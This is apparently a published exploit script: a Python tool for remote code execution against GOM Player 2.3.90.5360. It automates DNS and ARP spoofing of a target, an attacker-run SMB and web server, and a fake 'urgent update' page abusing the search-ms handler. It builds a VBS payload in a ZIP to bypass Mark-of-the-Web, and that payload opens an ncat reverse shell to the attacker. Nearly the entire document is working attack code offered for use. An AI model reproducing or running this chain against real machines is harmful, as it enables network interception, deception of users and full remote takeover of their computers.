GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

1. # Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
2. # Date: 26.08.2023
3. # Author: M. Akil Gündoğan
4. # Contact: https://twitter.com/akilgundogan
5. # Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
6. # Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
7. # Version: 2.3.90.5360
8. # Tested on: Windows 10 Pro x64 22H2 19045.3324
9. # PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
10.  
11. # Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
12.  
13. # Vulnerability Description:
14. # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
15. # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
16. # In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
17.  
18. # Full disclosure, developers should be more careful about software security.
19.  
20. # Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
21.  
22. # Some spaghetti and a bad code but it works :)
23.  
24. banner = """\033[38;5;196m+-----------------------------------------------------------+
25. |     GOM Player 2.3.90.5360 - Remote Code Execution        |
26. |   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
27. +-----------------------------------------------------------+\033[0m""" +"""
28. \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
29.  
30. import time,os,zipfile,subprocess,socket,sys
31.  
32. print(banner)
33.  
34. if os.geteuid() != 0:
35.     print("You need root privileges to run the exploit, please use sudo...")
36.     sys.exit(1)
37.  
38. targetIP = input("- Target IP address: ")
39. listenPort = input("- Listening port for Reverse Shell: ")
40.  
41. def fCreate(fileName,fileContent): # File create func.
42.     f = open(fileName,"w")
43.     f.write(fileContent)
44.     f.close()    
45.  
46. gw = os.popen("ip -4 route show default").read().split()
47. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
48. s.connect((gw[2], 0))
49. ipaddr = s.getsockname()[0]
50. gateway = gw[2]
51. host = socket.gethostname()
52. print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
53.  
54. print("\n[*]- Stage 1: Downloading neccesary tools...")
55.  
56. smbFolderName = "GomUpdater" # change this (optional)
57. expWorkDir = "gomExploitDir" # change this (optional)
58. os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
59. time.sleep(1) # It's necessary for exploit stability.
60. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
61. time.sleep(1) # It's necessary for exploit stability.
62. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
63. print("    [*] - Ncat has been downloaded.")
64. subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
65. print("    [*] - Impacket has been downloaded.")
66. subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
67. print("    [*] - DNSSpoof.py has been downloaded.")
68.  
69. print("[*]- Stage 2: Creating Attacker SMB Server...")
70. subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
71. time.sleep(5) # It's necessary for exploit stability.
72.  
73. smbIP = ipaddr
74. spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
75.  
76. print("[*]- Stage 3: Creating Attacker Web Page...")
77.  
78. # change this (optional)
79. screenExpPage = """
80. <meta charset="utf-8">
81. <script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
82. <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
83. </script>
84. """
85.  
86. fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
87. time.sleep(3) # It's necessary for exploit stability.
88.  
89. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
90. vbsCommand = '''Set shell=CreateObject("wscript.shell")
91. Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
92. WScript.Sleep 5000
93. Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
94. vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
95. fCreate(expWorkDir + "/payload.vbs",vbsCommand)
96.  
97. urlShortcut = '''[InternetShortcut]
98. URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
99. IDlist='''
100. fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
101. time.sleep(3) # It's necessary for exploit stability.
102. zipName = expWorkDir + "/smb-shared/archive.zip"
103. payload_filename = os.path.join(expWorkDir, "payload.vbs")  
104.  
105. with zipfile.ZipFile(zipName, "w") as malzip:
106.     malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
107.  
108. print("[*]- Stage 5: Running the attacker's web server...")
109. subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
110. time.sleep(3) # It's necessary for exploit stability.
111.  
112. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
113. subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
114. time.sleep(10) # It's neccesary for exploit stability.
115. os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
116. os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
117. print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
118. subprocess.run("nc -lvnp " + listenPort,shell=True)
119. subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
120.